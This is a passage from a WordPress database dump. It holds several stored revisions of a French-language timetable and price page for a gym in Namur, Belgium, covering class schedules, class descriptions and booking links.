class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:36:41', '2014-08-31 08:36:41', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(492, 3, '2015-09-02 16:57:19', '2015-09-02 16:57:19', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png\"><img class=\"alignnone size-medium wp-image-491\" alt=\"Capture d’écran 2015-09-02 à 18.56.23\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23-300x211.png\" width=\"300\" height=\"211\" /></a>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 16:57:19', '2015-09-02 16:57:19', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(483, 1, '2015-04-21 09:55:06', '2015-04-21 09:55:06', '<h1>Small Group Training:</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 09:55:06', '2015-04-21 09:55:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(456, 1, '2014-08-31 08:43:46', '2014-08-31 08:43:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€<br>30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€<br>30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€<br>1 carte de 10 séances : 90.00€ (valable 6 mois)<br>1 carte de 20 séances : 150.00€ (valable 6 mois)<br>1 carte de 50 séances : 300.00€ (valable 1 an)<br></td>\r\n</tr>\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:43:46', '2014-08-31 08:43:46', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(461, 1, '2014-12-15 19:40:04', '2014-12-15 19:40:04', '', 'LesMills', '', 'inherit', 'open', 'open', '', 'lesmills', '', '', '2014-12-15 19:40:04', '2014-12-15 19:40:04', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(466, 1, '2014-12-15 19:44:19', '2014-12-15 19:44:19', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"100\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:44:19', '2014-12-15 19:44:19', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(457, 1, '2014-08-31 08:47:00', '2014-08-31 08:47:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td 